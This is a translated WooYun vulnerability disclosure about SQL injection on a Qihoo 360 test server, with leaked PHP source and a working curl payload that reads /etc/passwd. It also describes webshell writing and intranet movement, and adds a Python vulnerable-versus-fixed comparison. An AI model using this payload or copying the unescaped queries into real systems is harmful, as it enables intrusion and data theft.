Just a tool: GETSHELL on a Qihoo 360 site and intranet roaming all the way to webscan

ID: 122949
URL: http://www.wooyun.org/bug.php?action=view&id=122949
Status: vendor has confirmed
Title: Just a tool: GETSHELL on a Qihoo 360 site and intranet roaming all the way to webscan
Type: successful intrusion event
Vendor: Qihoo 360
White hat: 举起手来
Submitted: 2015-06-26 16:47:00
Disclosed: 2015-08-10 18:10:00
Fixed: (not set)
Confirmed: 2015-06-26 00:00:00
Confirm Spend: 0
Tags: webshell, pentest methodology
Followers: 0
Bookmarks: 0
White-hat rating: self-assessed rank 20
Vendor rating: rank 20
Summary
A small issue led to all this. Skipping dinner this time; I'll eat after the roaming. Damn!
Details

It starts with this:
http://220.181.150.107/web.tgz
Obviously the site's source code. Download it and audit it; my guess was SQL injection:
➜ web cat web_function.php

<?php
$dir = dirname(__FILE__).'/';
require_once($dir."../db/db_function.php");
function verifyed($short_code, $token)
{
$state = NULL;
$pdo = connect2db();
if($pdo == NULL )
return 1;
$sql = sprintf("select * from receiver_reference_count where rev_jid='%s' and short_code='%s'", $token, $short_code); // both values are interpolated with no escaping: the injection point
//echo "sql:".$sql."\n";
$result = $pdo->query($sql);
if($result === NULL )
return 2;
foreach($result as $row)
{
$state = $row['state'];
}
//echo " state: ".$state;
if($state === NULL || $state === '' )
return 3;
else if($state == '0')
return 4;
return 0;
}
function get_nickname_by_short_code($short_code)
{
$jid = NULL;
$data = NULL;
$nickname = '';
$pdo = connect2db();
if($pdo == NULL )
return 1;
$sql = sprintf("select jid from short_hash_jid where short_hash = '%s'", $short_code); // second unescaped interpolation of the short code
//echo "sql:".$sql."\n";
$result = $pdo->query($sql);
if($result === NULL )
return 2;
foreach($result as $row)
{
$jid = $row['jid'];
}
//echo " state: ".$state;
if($jid === NULL || $jid === '' )
return 3;
$result = '';
$sql = sprintf("select name from ofUser where username='%s'", $jid); // $jid comes straight from the previous query result, still unescaped
//echo "sql:".$sql."\n";
$result = $pdo->query($sql);
if($result === NULL )
return 4;
foreach($result as $row)
{
$nickname = $row['name'];
}
//echo "name: ".$nickname.PHP_EOL;
$data = array('jid'=>$jid, 'nickname'=>$nickname);
return $data;
}
function get_play_time_by_short_code( $short_code )
{
$time = 5;
$pdo = connect2db();
if($pdo == NULL )
return $time;
$sql = sprintf("select play_time from short_hash_jid where short_hash='%s'", $short_code); // same pattern once more
//echo "sql:".$sql."\n";
$result = $pdo->query($sql);
if($result === NULL )
return $time;
foreach($result as $row)
{
$time = $row['play_time'];
//echo "time:".$time.PHP_EOL;
}
if($time === NULL || $time === '' || $time === '0')
$time = 5;
return $time;
}
//echo verifyed('bXhRdzQWj1JYDmos',"13438299142" );
/*
$data = get_nickname_by_short_code("1dhg05myYabJI5CO");
if( !is_int($data))
{
print_r($data);
}else{
echo $data.PHP_EOL;
}*/
//echo get_play_time_by_short_code("QgHUkVoFE7mhSD9P");
?>


Clearly injectable, but following the logic through, the entry point is get.php:

<?php
$dir = dirname(__FILE__).'/';
require_once($dir."../libs/util.php");
require_once("gen_html.php");
require_once("web_function.php");
if (isset($_COOKIE["token"]))
{
$token = $_COOKIE["token"];
}
//print_r($_COOKIE);
$query_str = isset($_SERVER['QUERY_STRING']) ? getParams($_SERVER['QUERY_STRING']) : '';
//echo "query_str: ".$query_str."<br>";
parse_str($query_str, $tmpArr);
//print_r($tmpArr);
if(isset($tmpArr['s']))
{
$short_code = $tmpArr['s'];
}
//echo "short_code: ".$short_code."<br>";
//print_r($_POST);
//////////////////////////////////////////////////////////////
//for Jump the page
$mobile = $_POST['mobile'];   // raw POST values, no validation; both go into verifyed() and from there into the SQL
$post_code = $_POST['code'];
if ($mobile != '')
{
// echo "short_code=".$post_code."mobile=".$mobile;
$ret = verifyed($post_code, $mobile);
// echo "ret == ".$ret;
if ($ret == 0)
{
setcookie("token", $mobile, time()+3600, "/", null);
response_picture_html($post_code, $mobile, $dir);
exit();
}
if ($ret == 4)
{
setcookie("token", $mobile, time()+3600, "/", null);
response_ad_html($dir, $post_code);
exit();
}
response_verify_html($post_code, $dir);
exit();
}
//////////////////////////////////////////////////////////////
//print_r($_COOKIE);
$ret = verifyed($short_code, $token); // $token is undefined when the cookie is absent; the cookie value is also interpolated unescaped
if ($ret == 0 )
{
setcookie("token", $token, time()+3600, "/", null);
response_picture_html($short_code, $token, $dir);
exit();
}
if($ret == 4)
{
response_ad_html($dir, $short_code);
exit();
}
response_verify_html($short_code, $dir);
exit();
?>


Combined with this file:

➜  web  cat gen_html.php 
<?php
$dir = dirname(__FILE__).'/';
require_once("../libs/SmartyTemplate.php");
require_once("../libs/util.php");
require_once("web_function.php");
function response_verify_html($code, $dir)
{
$tpl = 'template/verify.html.tpl';
$objSmarty = SmartyTemplate::getInstance();
$file_tpl = $dir.$tpl;
$objSmarty->assign('short_code',$code);
$url = "http://220.181.150.107/".$code.".htl";
$objSmarty->assign('thumb_src',$url);
@header('Conten-Type: text/html');
//@header('Cache-Control: no-cache, no-store, max-age=0');
@header('Cache-Control: no-cache, no-store');
@header('Pragma: no-cache');
@header('Expires: -1');
returnData(RESPONSE_OK, 'OK', $objSmarty->fetch($file_tpl));
}
function response_picture_html($code, $token, $dir)
{
$tpl = 'template/picture.html.tpl';
$finish_url = "http://220.181.150.107/".$code;
$counter = get_play_time_by_short_code($code);
$objSmarty = SmartyTemplate::getInstance();
$file_tpl = $dir.$tpl;
$url = "http://220.181.150.107/".$code.".htl?jid=".$token."&type=normal";
$objSmarty->assign('img_url',$url);
$objSmarty->assign('counter',$counter);
$objSmarty->assign('finish_url',$finish_url);
@header('Conten-Type: text/html');
//@header('Cache-Control: no-cache, no-store, max-age=0');
@header('Cache-Control: no-cache, no-store');
@header('Pragma: no-cache');
@header('Expires: -1');
//writeLog($file_tpl." why22222222222222", __FILE__, __LINE__, DOWNLOAD_RUN_LOG);
returnData(RESPONSE_OK, 'OK', $objSmarty->fetch($file_tpl));
}
function response_ad_html($dir, $short_code)
{
$tpl = 'template/ad.html.tpl';
$nickname = '';
$jid = '';

$data = get_nickname_by_short_code($short_code);
if( !is_int($data) )
{
$jid = $data['jid'];
$nickname = $data['nickname'];
//print_r($data);
}
$objSmarty = SmartyTemplate::getInstance();
//echo "nickname: ".$nickname." jid: ".$jid."<br>";
$file_tpl = $dir.$tpl;
$objSmarty->assign('nickname',$nickname);
$objSmarty->assign('jid',$jid);
@header('Conten-Type: text/html');
//@header('Cache-Control: no-cache, no-store, max-age=0');
@header('Cache-Control: no-cache, no-store');
@header('Pragma: no-cache');
@header('Expires: -1');
returnData(RESPONSE_OK, 'OK', $objSmarty->fetch($file_tpl));
}
?>


Putting the three files together gives this injection point:

curl http://220.181.150.107/web/get.php -d "mobile=13438299142' or 1=2 union select 2222222222222,1111111,0 limit 1 -- ;&code=1'  union select load_file('/etc/passwd') -- ;"

How the two halves of the payload cooperate: verifyed($post_code, $mobile) drops both POST values into sprintf, so the mobile value closes the rev_jid string, or 1=2 empties the original result, the union supplies a single three-column row (receiver_reference_count therefore has three columns) whose third column, state, is 0, and -- comments out the rest of the statement including the short_code clause. state == '0' makes verifyed() return 4, so get.php calls response_ad_html($dir, $post_code). That is the only branch that renders jid, and it obtains jid through get_nickname_by_short_code($post_code), where the union in the code value replaces jid with the output of load_file('/etc/passwd'); the ad template then prints it. Two things follow: the verification check is not just bypassed, it is used as the router that selects which injection gets its output displayed, and a working load_file() shows the database account holds the FILE privilege, which is what the next step depends on.
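To make the chain concrete, here is an added Python model of the two vulnerable functions next to parameterised versions. It is example code written for this edit, not part of the original report or of 360's application. It assumes an in-memory SQLite database with made-up tables standing in for MySQL, and substitutes sqlite_version() for load_file('/etc/passwd'), which SQLite does not have; the payload is otherwise the one above.

```python
import sqlite3

# Constructed stand-in for the MySQL schema implied by web_function.php.
# receiver_reference_count gets three columns because the published payload
# unions a three-value row into it. Every row here is made up.
SCHEMA = """
create table receiver_reference_count(rev_jid text, short_code text, state text);
create table short_hash_jid(short_hash text, jid text, play_time text);
create table ofUser(username text, name text);
insert into receiver_reference_count values ('13800000000', 'AAAA', '1');
insert into short_hash_jid values ('AAAA', 'alice@im.example', '5');
insert into ofUser values ('alice@im.example', 'Alice');
"""


def connect2db():
    conn = sqlite3.connect(":memory:")
    conn.row_factory = sqlite3.Row
    conn.executescript(SCHEMA)
    return conn


def state_to_ret(state):
    # Return codes of verifyed(): 3 = no row, 4 = state '0', 0 = verified.
    # str() stands in for PHP's loose ($state == '0'): the unioned literal 0
    # comes back from SQLite as an integer.
    if state is None or state == "":
        return 3
    if str(state) == "0":
        return 4
    return 0


def verifyed_vulnerable(conn, short_code, token):
    # Built exactly like the original sprintf(): no escaping of either value.
    sql = ("select * from receiver_reference_count "
           "where rev_jid='%s' and short_code='%s'" % (token, short_code))
    state = None
    for row in conn.execute(sql):
        state = row["state"]
    return state_to_ret(state)


def verifyed_fixed(conn, short_code, token):
    # Bound parameters: quotes, 'union' and '--' inside the values stay data.
    sql = "select * from receiver_reference_count where rev_jid=? and short_code=?"
    state = None
    for row in conn.execute(sql, (token, short_code)):
        state = row["state"]
    return state_to_ret(state)


def nickname_vulnerable(conn, short_code):
    # Like get_nickname_by_short_code(): the jid read by the first query is
    # interpolated, still unescaped, into the second one.
    jid = None
    for row in conn.execute(
            "select jid from short_hash_jid where short_hash = '%s'" % short_code):
        jid = row["jid"]
    if jid is None or jid == "":
        return 3
    nickname = ""
    for row in conn.execute("select name from ofUser where username='%s'" % jid):
        nickname = row["name"]
    return {"jid": jid, "nickname": nickname}


def nickname_fixed(conn, short_code):
    jid = None
    for row in conn.execute(
            "select jid from short_hash_jid where short_hash = ?", (short_code,)):
        jid = row["jid"]
    if jid is None or jid == "":
        return 3
    nickname = ""
    for row in conn.execute("select name from ofUser where username=?", (jid,)):
        nickname = row["name"]
    return {"jid": jid, "nickname": nickname}


def handle_post(mobile, code, verifyed, nickname):
    # The POST branch of get.php. Only the ret == 4 branch renders jid, so the
    # mobile injection must force state 0 for the code injection to show output.
    conn = connect2db()
    ret = verifyed(conn, code, mobile)
    if ret == 0:
        return ("picture", None)
    if ret == 4:
        return ("ad", nickname(conn, code))
    return ("verify", None)


# The report's payload, with sqlite_version() standing in for
# load_file('/etc/passwd'), which SQLite does not have.
MOBILE_PAYLOAD = "13438299142' or 1=2 union select 2222222222222,1111111,0 limit 1 -- ;"
CODE_PAYLOAD = "1'  union select sqlite_version() -- ;"


def attack(verifyed=verifyed_vulnerable, nickname=nickname_vulnerable):
    return handle_post(MOBILE_PAYLOAD, CODE_PAYLOAD, verifyed, nickname)


def expected_leak():
    # What the substituted function leaks in place of /etc/passwd.
    return sqlite3.sqlite_version


if __name__ == "__main__":
    print(attack())                                # ('ad', {'jid': '<version>', 'nickname': ''})
    print(attack(verifyed_fixed, nickname_fixed))  # ('verify', None)
```

Against the vulnerable pair the payload lands on the ad template with the leaked value in jid; against the bound-parameter pair the same payload is just an unknown phone number and short code, so the request falls through to the verify page while a genuine row still reaches the picture branch.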


Next, the same injection writes a file to disk and yields a shell. (Writing through MySQL needs the FILE privilege that load_file() already demonstrated, a secure_file_priv setting that allows the target directory, and a web-root directory the mysqld user can write to.)

(image: hosts.png)


Intranet roaming: ran into webscan.360.cn

(image: 3689ED9B-89B5-419B-A184-3A83D7D6EA57.png)

(image: A63F1E3E-74A9-4738-90FF-FF52557F8324.png)

POC

That's it; I'll stop here. The shell has been deleted.

Fix

Pointless anyway!

Status: 2015-06-26: Details sent to the vendor, awaiting handling
2015-06-26: Vendor confirmed; details visible to the vendor only
2015-07-06: Details opened to core white hats and domain experts
2015-07-16: Details opened to regular white hats
2015-07-26: Details opened to intern white hats
2015-08-10: Details made public
Vendor reply: Thanks for the report. This is a test server that was scheduled to be taken offline soon; it has now been taken offline.
Response: Severity: High; Vulnerability Rank: 20; Confirmed: 2015-06-26 18:09
Comments (commenter, likes, time)

Thanks for the report. This is a test server that was scheduled to be taken offline soon; it has now been taken offline.
Lonely (0 likes) 2015-08-15 20:52:00

Slap in the face
风炫 (0 likes) 2015-08-13 22:08:00

I'm off to try my luck with 360 too
路人毛 (0 likes) 2015-08-11 10:48:00

Heh, 360
破晓_Vampire (0 likes) 2015-08-11 09:07:00

Hands up. A chance like this probably comes once in a lifetime
明月影 (0 likes) 2015-08-10 20:24:00

I can roughly guess how this magic tool was written,
Busliv (0 likes) 2015-08-10 18:40:00

It's just a SQL injection, I can't see the highlight. How did it get a thunder?
爱梅小礼 (0 likes) 2015-07-31 18:37:00

The comment I posted a while ago is gone. I said the magic tool is curl; probably deleted for leaking information..
黑暗游侠 (0 likes) 2015-07-16 19:09:00

...
玉林嘎 (0 likes) 2015-07-16 18:19:00

Young hero, how did you get the path?
scanf (0 likes) 2015-07-12 11:03:00

Way too clickbaity. Why isn't it being dealt with? Seems even WooYun can't tolerate a competitor, haha
black hook (0 likes) 2015-07-12 03:08:00

@phith0n ha, don't mind it too much
wefgod (0 likes) 2015-07-08 14:58:00

@phith0n haha~
darker (0 likes) 2015-07-08 13:08:00

This is a bit clickbaity; I can't see what the roaming actually was?
phith0n (0 likes) 2015-07-08 12:36:00

[Stating a fact] 360's response time, handling time and rank payout are all pretty good.
Blackeagle (0 likes) 2015-07-08 12:08:00

Heh, 360!
残废 (0 likes) 2015-07-08 12:06:00

2015-06-26: Confirmed that a test file has a SQL injection vulnerability; after successful exploitation some machines in the IDC can be probed. Thanks again to the white hat! Nice
wefgod (0 likes) 2015-06-29 12:12:00

@举起手来 bro, that's a bit fierce,, finish your meal and it'll already be offline
小海 (0 likes) 2015-06-27 23:19:00

Whenever there's a vuln it's "a server about to be decommissioned", heh
围剿 (0 likes) 2015-06-27 10:10:00

nb!
秋风 (0 likes) 2015-06-27 01:37:00

Roamed 360~ mighty!
Coffee (0 likes) 2015-06-26 23:13:00

mark
V-King (0 likes) 2015-06-26 23:09:00

Heh, 360! "Some"!
black4yl (0 likes) 2015-06-26 23:02:00

40 rank in hand, OP is happy
Jinone (0 likes) 2015-06-26 19:52:00

Clickbait, you call this intranet roaming?
Holiday0 (0 likes) 2015-06-26 19:05:00

Qihoo 360, hands up
90Snake (0 likes) 2015-06-26 18:29:00

I wonder whether on Butian you wouldn't even get to see the title?
心伤的胖子 (0 likes) 2015-06-26 18:18:00

5 rank, young hero, take it!
Razor2012 (0 likes) 2015-06-26 17:50:00

OP's name is the highlight
zeracker (0 likes) 2015-06-26 17:49:00

Which means webscan itself wasn't taken
mickey (0 likes) 2015-06-26 17:48:00

Just looking
肉肉 (0 likes) 2015-06-26 17:44:00

23333
牛肉包子 (0 likes) 2015-06-26 17:39:00

Quick, hoard all the 0days, then ask for sharing
chopper (0 likes) 2015-06-26 17:26:00

360 rank, a must
夜鸥 (0 likes) 2015-06-26 17:23:00

Waiting for disclosure!
wy007 (0 likes) 2015-06-26 17:18:00

mark
(name missing) (0 likes) 2015-06-26 17:15:00

Wouldn't this vuln fetch 20k on Butian?
qdq (0 likes) 2015-06-26 17:13:00

Following
动后河 (0 likes) 2015-06-26 17:10:00

360 rank points, young hero, please accept.
Junkman (0 likes) 2015-06-26 17:10:00

Front row, buying sunflower seeds
he1renyagao (0 likes) 2015-06-26 17:10:00

360, slap slap!
子非海绵宝宝 (0 likes) 2015-06-26 17:09:00

Badass
scanf (0 likes) 2015-06-26 17:08:00

666666
M4sk (0 likes) 2015-06-26 17:04:00

Asking for the magic tool!
px1624 (0 likes) 2015-06-26 17:04:00

Submitting this vuln to an SRC would get at least 30k
mango (0 likes) 2015-06-26 17:01:00

Heh, 360
我是壮丁 (0 likes) 2015-06-26 17:00:00

........
Jumbo (0 likes) 2015-06-26 17:00:00

Heh, 360
hkAssassin (0 likes) 2015-06-26 16:57:00

Spectating
0x 80 (0 likes) 2015-06-26 16:55:00

Heh, 360
泳少 (0 likes) 2015-06-26 16:55:00

Heh, 360
Ghost丶与狼共舞 (0 likes) 2015-06-26 16:54:00

Probably not, last time a weak password only got 7
小不点 (0 likes) 2015-06-26 16:54:00

Low, 5 points, "this issue was already known through other channels, thanks for your submission"
天地不仁 以万物为刍狗 (0 likes) 2015-06-26 16:51:00

56 rank, take it
null_z (0 likes) 2015-06-26 16:51:00

Holy crap!!!
mango (0 likes) 2015-06-26 16:51:00

Heh, 360
kobin97 (0 likes) 2015-06-26 16:51:00

Heh, 360
淡漠天空 (0 likes) 2015-06-26 16:50:00

Heh, 360
f4ck (0 likes) 2015-06-26 16:49:00

Heh, 360
boooooom (0 likes) 2015-06-26 16:49:00

Heh, 360
啊L川 (0 likes) 2015-06-26 16:49:00

Holy crap!!!
浩天 (0 likes) 2015-06-26 16:49:00